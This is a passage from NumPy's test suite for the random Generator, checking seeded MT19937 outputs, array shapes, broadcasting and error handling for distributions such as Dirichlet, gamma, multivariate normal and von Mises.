assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
